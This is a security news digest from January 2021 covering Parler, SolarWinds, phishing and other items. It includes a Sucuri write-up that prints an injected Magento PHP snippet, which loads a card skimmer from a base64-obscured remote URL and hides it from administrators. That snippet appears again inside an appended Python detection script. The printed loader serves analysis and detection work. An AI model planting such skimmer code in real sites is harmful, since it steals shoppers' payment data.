Security daily (21-01-2021)

Rep. Maloney seeks FBI probe of Parler's role in Capitol attack

The House Oversight and Reform Committee on Thursday asked the FBI to investigate Parler’s role in the storming of the Capitol earlier this month, and its possible ties to Russia. The committee chair, Rep. Carolyn Maloney, D-NY, also requested that FBI Director Christopher Wray order an investigation into the social media application’s financing, according to the letter she sent to the bureau. Parler has come under scrutiny in recent weeks after rioters used the app to plan and coordinate the Jan. 6 attack on the Capitol Building. Apple and Google have removed Parler from their app marketplaces, while Amazon has ejected the site from its web hosting service over violent content. Maloney now contends the federal government should embark on its own probe. The FBI should “conduct a robust examination of the role that the social media site Parler played in the assault, including as a potential facilitator of planning […] (CyberScoop)

Biden orders US intelligence review of SolarWinds hack

President Joe Biden is ordering U.S. intelligence agencies to provide him with an assessment of a suspected Russian hacking operation that breached multiple U.S. federal agencies and exposed glaring weaknesses in U.S. cyber-defenses, the White House said Thursday. The move highlights how responding to the sophisticated spying operation, which has exploited software made by federal contractor SolarWinds, will shape the early days of Biden’s administration. It was not immediately clear what the intelligence review would entail, but Biden has vowed to get a full understanding of the computer intrusions and their impact. “Even as we work with Russia to advance U.S. interests, so, too, we work to hold Russia to account for its reckless and adversarial actions,” White House Press Secretary Jen Psaki told reporters. Moscow has denied involvement in the hacking campaign. Biden has also tasked intelligence agencies with reviewing the extent of Russian interference in the 2020 election, […] (CyberScoop)

A phishing campaign's collateral damage: Stolen passwords were publicly searchable

A phishing campaign that targeted multiple industrial sectors in 2020 was messier than the average cybercrime operation. The perpetrators stole more than a thousand sets of credentials from corporate employees and then accidentally exposed that data on the public internet, according to a blog post from cybersecurity firm Check Point. The attackers made a “simple mistake in their attack chain,” the researchers said, by not securing the files once they were posted to sites set up to receive stolen data. The end result was an otherwise successful hacking operation that could have been undercut by sloppiness: A victim or an identity theft prevention system could have stumbled upon the breached data; or another set of crooks could have found the stolen credentials before the original attackers had a chance to sell or use them. “We found that once the users’ information was sent to the drop-zone servers, the data was […] (CyberScoop)

Social engineering gains momentum with cyber criminals

Public healthcare organizations are increasingly targeted by cyberattacks, prompting security strategies that focus more on people, says an IT security expert. (CyberScoop)

S3 Ep16: Darkweb bust, security at home, and browser snoopage [Podcast]

Here's the latest podcast - listen now! (Naked Security)

How to Use RedRabbit for Pen-Testing & Post-Exploitation of Windows Machines

RedRabbit is an ethical hacking toolkit built for pen-testing and reconnaissance. It can be used to identify attack vectors, brute-force protected files, extract saved network passwords, and obfuscate code. RedRabbit, built specifically for red teams, is the evil twin of BlueRabbit and the offensive half of the "Rabbit Suite."

The creator of RedRabbit, Ashley Moran, better known as securethelogs, makes a plethora of Windows-based ethical hacking and penetration testing tools. RedRabbit just happens to be one of my favorites.

RedRabbit offers pen-testers of Windows... (Null Byte « WonderHowTo)

Google Searches Expose Stolen Corporate Credentials

(News ≈ Packet Storm)

Malware Found On Laptops Given Out By Government To Students

(News ≈ Packet Storm)

SAP SolMan Vulnerability Exploitation Detected In The Wild

(News ≈ Packet Storm)

Magento PHP Injection Loads JavaScript Skimmer

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php

    ...
    // Runs only on GET requests for the checkout page, and only for visitors
    // without the Magento admin session cookie, so logged-in administrators
    // never see the skimmer load.
    if ($_SERVER["REQUEST_METHOD"] === "GET"){
        if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
            if(!isset($_COOKIE["adminhtml"])){
                // Fetches the skimmer from a base64-encoded URL and echoes it into the page.
                echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
            }
        }
    }

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents, and the URL is obfuscated with base64. (Sucuri Blog)
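As an added example (not code from the Sucuri write-up), the following Python triage script does the check a responder would want after reading the item above: it walks a PHP file, finds every base64_decode("...") string literal, decodes it, and reports the gating conditions around any remote fetch of the result. Those gates are the security-relevant part of this injection: the REQUEST_URI test limits the payload to the checkout page, and the !isset($_COOKIE[...]) test keeps it away from anyone holding the Magento admin session cookie, which is why a store administrator browsing their own site sees nothing wrong. The PHP embedded in the script is constructed to mirror the injected block; the regexes, field names and the benign sample are this example's own. Decoding the literal from the write-up yields the defanged URL https://underscorefw[.]com/src/krea.js.

```python
import base64
import binascii
import re

# Constructed sample: a stand-in for an infected
# app/code/core/Mage/Payment/Model/Method/Cc.php with the injected block
# from the write-up appended after the legitimate class.
SAMPLE_CC_PHP = r'''<?php
class Mage_Payment_Model_Method_Cc extends Mage_Payment_Model_Method_Abstract
{
    // ... legitimate Magento code elided ...
}
if ($_SERVER["REQUEST_METHOD"] === "GET"){
    if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
        if(!isset($_COOKIE["adminhtml"])){
            echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
        }
    }
}
'''

# Constructed benign sample: base64 used for plain data, no remote fetch.
BENIGN_PHP = r'''<?php
$label = base64_decode("SGVsbG8=");
echo htmlspecialchars($label);
'''

B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
REMOTE_FETCH = re.compile(r'\b(file_get_contents|curl_exec|fopen|include|require)\b')
URL_LIKE = re.compile(r'^https?://', re.I)
COOKIE_GATE = re.compile(r'!\s*isset\(\s*\$_COOKIE\[\s*["\'](\w+)["\']\s*\]\s*\)')
URI_GATE = re.compile(r'strpos\(\s*\$_SERVER\[\s*["\']REQUEST_URI["\']\s*\]\s*,\s*["\']([^"\']+)["\']')

LOOKBACK = 5  # preceding lines inspected for the conditions that gate a payload


def decode_literal(b64):
    """Decode a base64 literal; return None if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_php(source):
    """Report every base64_decode("...") call with its decoded value and the
    conditions that gate it. A finding is 'suspicious' when the decoded text
    is a URL and the same line hands it to a remote-fetch function."""
    lines = source.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        for m in B64_LITERAL.finditer(line):
            decoded = decode_literal(m.group(1))
            if decoded is None:
                continue
            fetch = REMOTE_FETCH.search(line)
            context = "\n".join(lines[max(0, idx - LOOKBACK):idx + 1])
            cookie = COOKIE_GATE.search(context)
            uri = URI_GATE.search(context)
            is_url = bool(URL_LIKE.match(decoded))
            findings.append({
                "line": idx + 1,
                "literal": m.group(1),
                "decoded": decoded,
                "is_url": is_url,
                "remote_fetch": fetch.group(1) if fetch else None,
                "hidden_from_cookie": cookie.group(1) if cookie else None,
                "uri_gate": uri.group(1) if uri else None,
                "suspicious": is_url and fetch is not None,
            })
    return findings


def report(findings):
    """Human-readable triage lines for the console."""
    out = []
    for f in findings:
        tag = "SUSPICIOUS" if f["suspicious"] else "info"
        out.append(f'[{tag}] line {f["line"]}: base64 -> {f["decoded"]!r}')
        if f["remote_fetch"]:
            out.append(f'    fetched via {f["remote_fetch"]}()')
        if f["uri_gate"]:
            out.append(f'    only when REQUEST_URI contains {f["uri_gate"]!r}')
        if f["hidden_from_cookie"]:
            out.append(f'    skipped when cookie {f["hidden_from_cookie"]!r} is set (hides from logged-in admins)')
    return out


if __name__ == "__main__":
    for sample in (SAMPLE_CC_PHP, BENIGN_PHP):
        print("\n".join(report(scan_php(sample))))
```

The heuristics are deliberately narrow: they catch the pattern in this write-up (a base64 literal fed straight into a remote fetch) and surface the admin-cookie and path gates so the analyst knows why the skimmer was invisible from the back end. Payloads split across variables, hex- or rot13-encoded URLs, or code pulled from the database rather than a core file will not trip it, so treat a clean result as "nothing matched this pattern", not as a clean install, and compare core files against a known-good Magento release as well.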

Einstein Healthcare Network Announces August Breach

Einstein is in violation of the HHS 60-day breach notification rule, but unlikely to face a penalty. (Threatpost)

SQL Server Malware Tied to Iranian Software Firm, Researchers Allege

Researchers have traced the origins of a campaign - infecting SQL servers to mine cryptocurrency - back to an Iranian software firm. (Threatpost)

Google Forms Set Baseline For Widespread BEC Attacks

Researchers warn that attackers are collecting reconnaissance for future business email compromise attacks using Google Forms. (Threatpost)

Google Searches Expose Stolen Corporate Credentials

A phishing campaign spoofs Xerox notifications to lure victims into clicking on malicious HTML attachments. (Threatpost)


/security-daily/ 22-01-2021 23:44:22